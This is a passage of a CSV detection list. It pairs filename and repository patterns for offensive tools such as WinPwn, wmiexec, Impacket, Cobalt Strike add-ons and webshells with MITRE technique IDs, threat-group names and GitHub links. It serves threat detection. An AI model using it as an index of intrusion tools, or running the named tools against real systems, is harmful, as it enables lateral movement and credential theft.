"*/WinPirate.bat*",".{0,1000}\/WinPirate\.bat.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","12635"
"*/WinPirate.git*",".{0,1000}\/WinPirate\.git.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","12636"
"*/WinPwn*",".{0,1000}\/WinPwn.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","12637"
"*/WinPwn.git*",".{0,1000}\/WinPwn\.git.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","12638"
"*/WinPwn_Repo*",".{0,1000}\/WinPwn_Repo.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","12639"
"*/WinPwnage*",".{0,1000}\/WinPwnage.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","12640"
"*/WinPwnage.git*",".{0,1000}\/WinPwnage\.git.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12641"
"*/winpwnage.py*",".{0,1000}\/winpwnage\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","12642"
"*/winregistry.py**",".{0,1000}\/winregistry\.py.{0,1000}.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","12644"
"*/winrm.cpp*",".{0,1000}\/winrm\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mez-0/winrmdll","1","1","N/A","N/A","10","10","144","28","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z","12645"
"*/winrm.py*",".{0,1000}\/winrm\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","12646"
"*/winrmdll*",".{0,1000}\/winrmdll.{0,1000}","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mez-0/winrmdll","1","1","N/A","N/A","10","10","144","28","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z","12647"
"*/winrm-reflective-dll/*",".{0,1000}\/winrm\-reflective\-dll\/.{0,1000}","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mez-0/winrmdll","1","1","N/A","N/A","10","10","144","28","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z","12648"
"*/winscp_dump.py*",".{0,1000}\/winscp_dump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","12649"
"*/Winsocky.git*",".{0,1000}\/Winsocky\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","N/A","10","10","98","18","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z","12650"
"*/winsos.exe*",".{0,1000}\/winsos\.exe.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","1","N/A","N/A","10","2","111","26","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z","12651"
"*/winsos-poc.git*",".{0,1000}\/winsos\-poc\.git.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","1","N/A","N/A","10","2","111","26","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z","12652"
"*/WinX Shell.php*",".{0,1000}\/WinX\sShell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","12653"
"*/wireless.py*",".{0,1000}\/wireless\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","12658"
"*/wiresocks.git*",".{0,1000}\/wiresocks\.git.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","1","N/A","N/A","9","3","287","30","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z","12669"
"*/wlanpass.txt*",".{0,1000}\/wlanpass\.txt.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","0","#linux","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","12689"
"*/WMEye.git*",".{0,1000}\/WMEye\.git.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1047 - T1053.005 - T1124 - T1203 - T1569.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","8","4","365","59","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z","12690"
"*/wmeye/*",".{0,1000}\/wmeye\/.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1047 - T1053.005 - T1124 - T1203 - T1569.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","8","4","365","59","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z","12691"
"*/WMI Lateral Movement/*",".{0,1000}\/WMI\sLateral\sMovement\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","N/A","10","10","347","57","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z","12692"
"*/wmi.dropper*",".{0,1000}\/wmi\.dropper.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","12693"
"*/WMI/wmi.py*",".{0,1000}\/WMI\/wmi\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","12694"
"*/wmi_exec.exe*",".{0,1000}\/wmi_exec\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","12695"
"*/wmiexec.py*",".{0,1000}\/wmiexec\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","12696"
"*/wmiexec.py*",".{0,1000}\/wmiexec\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","12697"
"*/wmiexec.py*",".{0,1000}\/wmiexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","12698"
"*/wmiexec/*",".{0,1000}\/wmiexec\/.{0,1000}","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","Dispossessor - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Exploitation tool","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","N/A","2","159","27","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z","12699"
"*/wmiexec2.git*",".{0,1000}\/wmiexec2\.git.{0,1000}","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1021.005 - T1047 - T1059.001 - T1059.003 - T1059.005","TA0008 - TA0002 - TA0011","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","34","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z","12700"
"*/wmiexec-Pro*",".{0,1000}\/wmiexec\-Pro.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","12701"
"*/wmiexec-Pro.git*",".{0,1000}\/wmiexec\-Pro\.git.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","12702"
"*/WMIHACKER.git*",".{0,1000}\/WMIHACKER\.git.{0,1000}","offensive_tool_keyword","WMIHACKER","Bypass anti-virus software lateral movement command execution test tool - No need 445 Port","T1047 - T1569.002 - T1218 - T1036.005","TA0008 - TA0002 - TA0005","N/A","N/A","Lateral Movement","https://github.com/rootclay/WMIHACKER","1","1","N/A","N/A","9","10","1423","236","2025-01-20T15:37:28Z","2020-07-02T06:57:25Z","12703"
"*/WMIHACKER.vbs*",".{0,1000}\/WMIHACKER\.vbs.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","12704"
"*/WMIHACKER.vbs*",".{0,1000}\/WMIHACKER\.vbs.{0,1000}","offensive_tool_keyword","WMIHACKER","Bypass anti-virus software lateral movement command execution test tool - No need 445 Port","T1047 - T1569.002 - T1218 - T1036.005","TA0008 - TA0002 - TA0005","N/A","N/A","Lateral Movement","https://github.com/rootclay/WMIHACKER","1","1","N/A","N/A","9","10","1423","236","2025-01-20T15:37:28Z","2020-07-02T06:57:25Z","12705"
"*/wmipersist.exe*",".{0,1000}\/wmipersist\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","12706"
"*/wmipersist.py*",".{0,1000}\/wmipersist\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral 